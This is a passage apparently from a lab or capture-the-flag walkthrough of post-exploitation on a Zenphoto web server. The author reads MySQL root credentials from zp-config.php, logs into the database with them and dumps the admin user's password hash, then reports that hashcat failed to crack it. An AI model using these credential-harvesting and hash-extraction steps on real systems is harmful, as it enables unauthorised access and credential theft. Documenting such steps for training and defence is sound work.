MySQL
Checking for DB credentials after performing a manual system enumeration
www-data@offsecsrv:/var/www/test/zp-data$ cat zp-config.php | grep -v '^[#/]'
<?php /* PUT NOTHING BEFORE THIS LINE, not even a line break! */
global $_zp_conf_vars;
$conf = array();
Note: zp-config.php.source is the source file for zp-config.php
For most installations Setup.php will copy zp-config.php.source to zp-config.php and
make the necessary changes to it. Unless this fails you most likely have no need even
to read this file.
If for some reason setup.php is not able to edit the zp-config.php file and you cannot
fix the file/folder permissions so that it can then you may have copy the
zp-config.php.source file to zp-config.php and make changes here manually.
Advanced installations may wish to modify the album folder definitions below.
Also on some servers zenphoto has problems correctly determining the WEB path and
SERVER path. For these cases you will need to implement the path overrides below.
$conf['db_software'] = 'MySQL'; // someday we may support other databases
** might be a different software **/
$conf['mysql_user'] = 'root'; // Supply your Database user id.
$conf['mysql_pass'] = 'hola'; // Supply your Database password.
$conf['mysql_host'] = 'localhost'; // Supply the name of your Database server.
$conf['mysql_database'] = 'zenphoto'; // Supply the name of Zenphoto's database
$conf['mysql_prefix'] = "zp_";
$conf['UTF-8'] = true;
$conf['album_folder'] = '/albums/';
$conf['album_folder_class'] = 'std';
$conf['server_protocol'] = "http";
$conf['FILESYSTEM_CHARSET'] = 'UTF-8';
if (!defined('CHMOD_VALUE')) { define('CHMOD_VALUE',0755); }
$_zp_conf_vars = $conf;
unset($conf);
?>DB credential identified; root:hola
root Session
www-data@offsecsrv:/var/www/test/zp-data$ mysql -h 127.0.0.1 -uroot -phola
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 72
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> Session established
mysql> SHOW databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| zenphoto |
+--------------------+
3 rows in set (0.00 sec)
mysql> use zenphoto;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SELECT user,pass FROM zp_administrators;
+----------------+------------------------------------------+
| user | pass |
+----------------+------------------------------------------+
| administrators | NULL |
| viewers | NULL |
| bozos | NULL |
| album managers | NULL |
| default | NULL |
| newuser | NULL |
| admin | 63e5c2e178e611b692b526f8b6332317f2ff5513 |
+----------------+------------------------------------------+
7 rows in set (0.00 sec)Password hash found for the admin user; 63e5c2e178e611b692b526f8b6332317f2ff5513
hashcat was unable to cracked the password hash